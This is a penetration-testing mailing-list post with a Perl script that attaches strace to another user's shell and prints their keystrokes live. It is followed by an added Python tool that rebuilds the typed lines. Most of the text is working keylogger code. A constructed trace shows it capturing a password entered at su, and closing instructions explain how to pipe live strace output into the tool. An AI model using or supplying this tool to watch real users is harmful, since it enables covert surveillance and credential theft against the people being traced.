Penetration Testing mailing list archives

Re: Keystroke logging with strace (no setup required)
From: rootsuid <rootsuid () gmail com>
Date: Tue, 12 Jul 2005 19:15:46 +0000

I didn't like going between terminals (even through screen), so I
just changed the one line:
---
open (F, "tail -f $ARGV[0] |"); 
---- changes to
open (F, "strace -p $ARGV[0] 2>&1 |");
---- 
Then you run ./strace_clean.pl <PID>.
Also, if you aren't familiar with Perl: this script waits for
line returns (so it does work on other applications too, but you will
not see the text until the user hits enter, vim, etc.).

--root

----- strace_clean-new.pl
#!/usr/bin/perl
#
#  Monitoring a user's shell commands by using strace and displaying and
#  cleaning up the read() syscalls.
#  Based on the tip posted to secfocus by Mark Lachniet, written by Tom
#  Van de Wiele.
#
#  This version runs strace itself instead of reading a logfile written by
#  /usr/bin/script, so a single terminal is enough:
#
#       # perl strace_clean.pl <PID of shell of user>
#
#  The original two-terminal procedure (tail -f on the logfile) was:
#
#       # script /tmp/what_is_user_foo_doing.log
#       Script started, file is /tmp/what_is_user_foo_doing.log
#       # strace -p <PID of shell of user>
#
#       Using a different terminal at the same time:
#       # perl strace_clean.pl /tmp/what_is_user_doing.log
#
use strict;  # hi Kris :)
use warnings;

# Only a numeric PID may reach the shell command built below.
my $pid = shift @ARGV;
die "usage: $0 <PID>\n" unless defined $pid && $pid =~ /^\d+$/;

# Unbuffered output: a raw-mode shell reads one key per read(), so show each
# key as it arrives rather than when perl sees a newline.  A program reading
# its tty in canonical mode still delivers the whole line only after Enter.
$| = 1;

# strace writes the trace to stderr, so merge it into the pipe we read from.
open (my $F, "strace -p $pid 2>&1 |") or die "cannot run strace: $!";
while (<$F>) {
       next if !/^read/;
       # Keep only reads from fd 0 (the user's tty) and grab the quoted buffer.
       if (/^read\(0,\s\"(.*)\".*/) {
               my $char = $1;
               if ($char =~ /\\[rn]/) {        # Enter: \r in raw mode, \n in canonical mode
                       print "\n";
               }
               elsif ($char =~ /\\177/) {      # DEL, the backspace key
                       print "\b";
               }
               elsif ($char =~ /\\t/) {
                       print "<TAB>";
               }
               else {
                       print $char;
               }
       }
}
close $F;
#EOF
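The script above prints strace's escaped strings almost verbatim, which is fine for plain ASCII but leaves octal escapes such as \303\251 unreadable, prints a backspace instead of applying it, and lets arrow-key escape sequences (\33[A ...) through into the output. The Python below is an added example, not code from the original post, from the poster or from strace: it decodes strace's C-string escaping, keeps only read() calls on fd 0, and replays the bytes the way a line editor would, so the result is the list of lines the user actually entered. The sample transcript is constructed, not captured; the `[pid NNNN]` prefix is the one strace -f prints, and treating `<... read resumed>` lines as stdin is an assumption of the example, since strace does not repeat the fd on that line.

```python
import re

# strace prints a read() buffer as a C string literal: printable ASCII verbatim,
# everything else as \f \n \r \t \v \" \\ or an octal escape such as \177 (DEL,
# the backspace key) or \33 (ESC, the first byte of an arrow-key sequence).
_ESCAPE_RE = re.compile(r'\\(f|n|r|t|v|"|\\|[0-7]{1,3})')
_SIMPLE = dict(zip('fnrtv"\\', b'\x0c\n\r\t\x0b"\\'))

# A completed read() on fd 0; the "[pid NNNN]" tag added by strace -f is optional.
# "<... read resumed>" is what strace prints when it attached while the read was
# already blocking; the fd is not visible there, so this example assumes the tty.
_READ_RE = re.compile(
    r'^(?:\[pid\s+\d+\]\s+)?(?:read\(0,|<\.\.\. read resumed>)\s*'
    r'"((?:[^"\\]|\\.)*)"(?:\.\.\.)?,\s*\d+\)\s*=\s*\d+')  # "..." = cut off by -s

def unescape(literal: str) -> bytes:
    """Turn the body of a strace string literal back into the raw bytes read."""
    out, pos = bytearray(), 0
    for m in _ESCAPE_RE.finditer(literal):
        out += literal[pos:m.start()].encode('latin-1')
        tok = m.group(1)
        out.append(_SIMPLE[tok] if tok in _SIMPLE else int(tok, 8))
        pos = m.end()
    out += literal[pos:].encode('latin-1')
    return bytes(out)

class TtyLineReconstructor:
    """Replays tty input the way a line editor sees it: a raw-mode shell gets one
    byte per read(), so Backspace, Ctrl-U and arrow-key sequences must be applied
    rather than printed; a canonical-mode password prompt gets the whole line at once."""

    def __init__(self) -> None:
        self.lines: list[str] = []   # completed lines, as the user typed them
        self._cur = bytearray()      # bytes of the line being edited
        self._esc = bytearray()      # escape sequence in progress (may span reads)

    def feed_transcript(self, text: str) -> list[str]:
        for line in text.splitlines():
            self.feed_strace_line(line)
        return self.lines

    def feed_strace_line(self, line: str) -> bool:
        """Consume one line of strace output; True if it was a stdin read()."""
        m = _READ_RE.match(line)
        if not m:
            return False
        self.feed_bytes(unescape(m.group(1)))
        return True

    def feed_bytes(self, data: bytes) -> None:
        for b in data:
            if self._esc:
                self._esc.append(b)
                # ESC [ ... and ESC O ... end at a byte in 0x40..0x7E; other ESC x are two bytes
                if self._esc[1:2] not in (b'[', b'O') or (len(self._esc) > 2 and 0x40 <= b <= 0x7E):
                    self._esc.clear()
            elif b == 0x1B:
                self._esc.append(b)
            elif b in (0x0D, 0x0A):              # Enter: \r in raw mode, \n in canonical mode
                self.lines.append(self._render(self._cur))
                self._cur = bytearray()
            elif b in (0x7F, 0x08):              # Backspace / DEL
                self._backspace()
            elif b == 0x15:                      # Ctrl-U: kill the whole line
                self._cur.clear()
            else:
                self._cur.append(b)

    def _backspace(self) -> None:
        # Delete one character, not one byte: drop UTF-8 continuation bytes first.
        while self._cur and 0x80 <= self._cur[-1] <= 0xBF:
            self._cur.pop()
        if self._cur:
            self._cur.pop()

    @staticmethod
    def _render(raw: bytearray) -> str:
        text = raw.decode('utf-8', errors='replace')
        return ''.join('<TAB>' if c == '\t' else '^' + chr(ord(c) + 0x40)
                       if ord(c) < 0x20 else c for c in text)

# Constructed sample (not real captured output): a raw-mode shell receiving "l",
# an accidental "é" (two UTF-8 bytes) erased with one Backspace, "s<Enter>", then
# up-arrow, Ctrl-U, "su<Enter>"; su, traced via -f, reads the password line in
# canonical mode.  The read() on fd 3 is not keyboard input and must be ignored.
SAMPLE_TRACE = r"""read(0, "l", 1)                         = 1
read(0, "\303", 1)                      = 1
read(0, "\251", 1)                      = 1
read(0, "\177", 1)                      = 1
read(0, "s", 1)                         = 1
read(0, "\r", 1)                        = 1
read(0, "\33", 1)                       = 1
read(0, "[", 1)                         = 1
read(0, "A", 1)                         = 1
read(0, "\25", 1)                       = 1
read(0, "s", 1)                         = 1
read(0, "u", 1)                         = 1
read(0, "\r", 1)                        = 1
[pid  4301] read(0, "hunter2\n", 4096)  = 8
[pid  4301] read(3, "not the tty", 4096) = 11
"""
```

`TtyLineReconstructor().feed_transcript(SAMPLE_TRACE)` yields `['ls', 'su', 'hunter2']`: the two-byte "é" disappears with a single Backspace, the up-arrow is swallowed, and the password read in canonical mode arrives as one complete line. For live use, pipe `strace -f -p <PID> 2>&1` (strace writes to stderr) into a loop that calls `feed_strace_line()` per line; the up-arrow case also shows the limit of the technique, since a line recalled from history is redrawn by readline on stdout and never appears on stdin.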

